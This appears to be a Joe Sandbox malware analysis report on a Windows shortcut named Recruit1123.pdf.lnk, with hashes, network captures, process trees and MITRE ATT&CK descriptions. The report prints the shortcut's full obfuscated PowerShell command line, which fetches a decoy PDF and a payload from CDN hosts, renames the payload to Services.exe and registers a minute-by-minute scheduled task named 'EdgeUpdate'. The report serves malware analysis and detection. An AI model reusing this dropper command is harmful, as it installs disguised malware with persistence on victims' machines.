SHA-512:	16C327DE91CA0C87FDAA6E950F11592E1FEEB32100CBBEA942D0DF50BFB6A62C4A08AAF23CCA3EE7C551AA0F9FCBB1D7D06B6E24C32520410C4537C10DB780E7
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.`.. ....W........>......>................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....7".........>.....t.2.....qW.Q .RECRUI~1.LNK..X......DWO`qW.Q..........................G...R.e.c.r.u.i.t.1.1.2.3...p.d.f...l.n.k.......Y...............-.......X...........O..#.....C:\Users\user\Desktop\Recruit1123.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e..................................................................................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed May 11 08:09:09 2022, mtime=Wed Feb 1 04:11:32 2023, atime=Wed May 11 08:09:09 2022, length=452608, window=hide
Entropy (8bit):	3.8329507237964515
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Recruit1123.pdf.lnk
File size:	3'562 bytes
MD5:	948b3b9b444731029662621b55322e3c
SHA1:	54ef6b79fae6b105f86c1c511389021ea92a79bc
SHA256:	b019ed0bb09bda78af75f941ba1bb88f3b3e3604a202309d8661fdaacb04d02e
SHA512:	4b407eef40f33e160b81d6f7ca011a3262eb8ac10044678b54b330ccf214084106d0e2f33dce5669611176527ab1ddbd7356317d3199f69f2424bfdb66f12833
SSDEEP:	48:8oLuaFktOWoLsLcK9Cn9e9+SLWcbEbxEqd0Y9XuHQBqiYLq4:8oLXkO9If9Cn9e9JabxEZY1um3YLq
TLSH:	D571FC1417E40224F3F35F3A98F766119837F85DEE228ADE5190C68C08A1628E835F2F
File Content Preview:	L..................F.@.. .....I..e.......5....I..e...............................P.O. .:i.....+00.../C:\...................V.1.....?V....Windows.@........OwHAV."....L.........................W.i.n.d.o.w.s.....Z.1.....?V....System32..B........OwHAV."......

File Icon


Icon Hash:	696951d5dddb4965

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	-w 1 $ProgressPreference = 'SilentlyContinue';i''w''r "https://pd560.b-cdn.net/fha" -OutFile C:\Users\Public\Recruit1123.pdf;s''a''p''s C:\Users\Public\Recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -OutFile "C:\Windows\Tasks\jumbo";r''e''n -Path "C:\Windows\Tasks\jumbo" -NewName "C:\Windows\Tasks\Services.exe";c''p''i 'C:\Users\Public\Recruit1123.pdf' -destination .;S''C''H''T''A''S''K''S'' /Create /Sc minute /Tn EdgeUpdate /tr 'C:\Windows\Tasks\Services';e''r''a''s''e *d?.?n?
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2023 11:12:57.944576979 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:57.944608927 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:57.944688082 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:57.956161976 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:57.956175089 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.283561945 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.283677101 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:58.287754059 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:58.287763119 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.288203001 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.302714109 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:58.349255085 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.576272011 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.576359034 CET	443	49729	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:58.576458931 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:58.589298964 CET	49729	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.012465954 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.012501001 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.012581110 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.013202906 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.013216972 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.333381891 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.333477974 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.334880114 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.334892988 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.335235119 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.336299896 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.377271891 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.633892059 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.633950949 CET	443	49730	212.102.46.118	192.168.2.4
Nov 17, 2023 11:12:59.634002924 CET	49730	443	192.168.2.4	212.102.46.118
Nov 17, 2023 11:12:59.634459019 CET	49730	443	192.168.2.4	212.102.46.118

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2023 11:12:57.775055885 CET	57873	53	192.168.2.4	1.1.1.1
Nov 17, 2023 11:12:57.931971073 CET	53	57873	1.1.1.1	192.168.2.4
Nov 17, 2023 11:12:58.855443001 CET	52955	53	192.168.2.4	1.1.1.1
Nov 17, 2023 11:12:59.011113882 CET	53	52955	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 17, 2023 11:12:57.775055885 CET	192.168.2.4	1.1.1.1	0x90db	Standard query (0)	pd560.b-cdn.net	A (IP address)	IN (0x0001)	false
Nov 17, 2023 11:12:58.855443001 CET	192.168.2.4	1.1.1.1	0x9743	Standard query (0)	pld956.b-cdn.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 17, 2023 11:12:57.931971073 CET	1.1.1.1	192.168.2.4	0x90db	No error (0)	pd560.b-cdn.net		212.102.46.118	A (IP address)	IN (0x0001)	false
Nov 17, 2023 11:12:59.011113882 CET	1.1.1.1	192.168.2.4	0x9743	No error (0)	pld956.b-cdn.net		212.102.46.118	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pd560.b-cdn.net

pld956.b-cdn.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49729	212.102.46.118	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Direction	Data
2023-11-17 10:12:58 UTC	OUT	GET /fha HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pd560.b-cdn.net Connection: Keep-Alive
2023-11-17 10:12:58 UTC	IN	HTTP/1.1 403 Forbidden Date: Fri, 17 Nov 2023 10:12:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: BunnyCDN-WA1-1120 CDN-RequestId: 3543157c95d314c03a089ddd23218edd
2023-11-17 10:12:58 UTC	IN	Data Raw: 32 63 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 62 2d 63 64 6e 2e 6e 65 74 2f 61 73 73 65 74 73 2f 6c 61 6e 64 69 6e 67 70 61 67 65 2f 63 73 73 2f 75 6e 63 6f 6e 66 69 67 75 72 65 64 2e 63 73 73 22 3e 20 3c 74 69 74 6c 65 3e 42 75 6e 6e 79 43 44 4e 20 4e 6f 64 65 20 57 41 31 2d 31 31 32 30 3c 2f 74 Data Ascii: 2c9<html><head> <link href="http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css"> <title>BunnyCDN Node WA1-1120</t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49730	212.102.46.118	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-17 10:12:59 UTC	1	OUT	GET /jhv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pld956.b-cdn.net Connection: Keep-Alive
2023-11-17 10:12:59 UTC	1	IN	HTTP/1.1 403 Forbidden Date: Fri, 17 Nov 2023 10:12:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: BunnyCDN-WA1-1120 CDN-RequestId: fc8d291ffe4e221e1bf1bea7a0c406a4
2023-11-17 10:12:59 UTC	1	IN	Data Raw: 32 63 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 62 2d 63 64 6e 2e 6e 65 74 2f 61 73 73 65 74 73 2f 6c 61 6e 64 69 6e 67 70 61 67 65 2f 63 73 73 2f 75 6e 63 6f 6e 66 69 67 75 72 65 64 2e 63 73 73 22 3e 20 3c 74 69 74 6c 65 3e 42 75 6e 6e 79 43 44 4e 20 4e 6f 64 65 20 57 41 31 2d 31 31 32 30 3c 2f 74 Data Ascii: 2c9<html><head> <link href="http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css"> <title>BunnyCDN Node WA1-1120</t

Target ID:	0
Start time:	11:12:54
Start date:	17/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 $ProgressPreference = 'SilentlyContinue';i''w''r "https://pd560.b-cdn.net/fha" -OutFile C:\Users\Public\Recruit1123.pdf;s''a''p''s C:\Users\Public\Recruit1123.pdf;i''w''r "https://pld956.b-cdn.net/jhv" -OutFile "C:\Windows\Tasks\jumbo";r''e''n -Path "C:\Windows\Tasks\jumbo" -NewName "C:\Windows\Tasks\Services.exe";c''p''i 'C:\Users\Public\Recruit1123.pdf' -destination .;S''C''H''T''A''S''K''S'' /Create /Sc minute /Tn EdgeUpdate /tr 'C:\Windows\Tasks\Services';e''r''a''s''e *d?.?n?
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:12:54
Start date:	17/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:12:58
Start date:	17/11/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /Create /Sc minute /Tn EdgeUpdate /tr C:\Windows\Tasks\Services
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FFD9B887125 Relevance: .7, Instructions: 721COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b6c51e5f66fe052bfeb236c2909a97340347461ce6cf0a2f8a7dc51d38eb80
Instruction ID: d3b5cb3da1c2bdf881db529e349478d4e93327fea17aaf7eeb1cec085181cf6e
Opcode Fuzzy Hash: a4b6c51e5f66fe052bfeb236c2909a97340347461ce6cf0a2f8a7dc51d38eb80
Instruction Fuzzy Hash: 54F1D330A18A4D8FDB99EF5CC465AA97BF1FF58310F1541BAD01DD72A6CA34E842CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B885CFA Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2698a3d3d5099a0a28ce046581a2af5742377d3f28bd80f120a1f014bd1cb714
Instruction ID: 4d80d22650bc6d092ec209210e64b1517c4a732273d632e12a3a4270fc7ab039
Opcode Fuzzy Hash: 2698a3d3d5099a0a28ce046581a2af5742377d3f28bd80f120a1f014bd1cb714
Instruction Fuzzy Hash: 1B022331A09A4D8FDB98EF5CC4A5AE97BF1FF58300F1441BAD459C7296DA34E842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8854D3 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b720899c30e944121a96b8558940e090e3ffcc6623eb2cd993e8cb979f2ffbba
Instruction ID: 6edc8ed1d67d39776441136f25a2ba323fc0a3533adbf7f5524b8edd2f2b8c83
Opcode Fuzzy Hash: b720899c30e944121a96b8558940e090e3ffcc6623eb2cd993e8cb979f2ffbba
Instruction Fuzzy Hash: 31E1A130A09A4D8FDF98EF9CC455AE977F1FF68300F1541AAD419D7296CA34E882CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B952A25 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704310526.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c81c388e0c08990570911d03d67cb222d514572188cc068bf66dd3c0a1da557
Instruction ID: bce43df4641d4763f54534deac2fe17c969a5f9fe8bea01cc2292acdb23bcc5d
Opcode Fuzzy Hash: 4c81c388e0c08990570911d03d67cb222d514572188cc068bf66dd3c0a1da557
Instruction Fuzzy Hash: D6D15632B1FACE1FE7A59BE888645B57BA1EF56310B0900FED85DCB0E3D918A905C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B885563 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 435ccb4f0b3e96601677ff00a2a26666b8c7e19d00199a4b6655140bedacad7b
Instruction ID: f809262ccd67128f2c1ae37aaac35b41cd39ae607dd058d176f288ed645081b6
Opcode Fuzzy Hash: 435ccb4f0b3e96601677ff00a2a26666b8c7e19d00199a4b6655140bedacad7b
Instruction Fuzzy Hash: DAF0653270CA0C4BA70CAA5CBC565F977C1DB95361B10417FF44AC769BEC16AC8786C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8873C3 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab0792e96e83772db3263685bfb7f5bf470411dec5ed1f708a05deb6c7cbe22
Instruction ID: 39ea0f41c6df84b71fe68267024faa0cc8bab208c5b2a0b5db0968d38f438ebf
Opcode Fuzzy Hash: fab0792e96e83772db3263685bfb7f5bf470411dec5ed1f708a05deb6c7cbe22
Instruction Fuzzy Hash: B6F0303275C6044FDB4CAA1CF8529B5B3D1E799334B10026FE48BC3696D926E8438685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B887408 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703962039.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
Instruction ID: 995c11984c22257c5978d792801a6d31a467c86429b7cf48f598ddd70bad7f64
Opcode Fuzzy Hash: 70744461ae5ccc717cd413a90b27d3fe3270dfe4984880f8163348218504d8b2
Instruction Fuzzy Hash: C7F0373275C6048FDB5CAA1CF8529B573D1E799320B10016EE48BC3696E927E8428685

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Recruit1123.pdf.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oousz00f.vha.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shg1umoc.4dp.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JAP8UAGKQEG5WI0P5G7E.temp

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

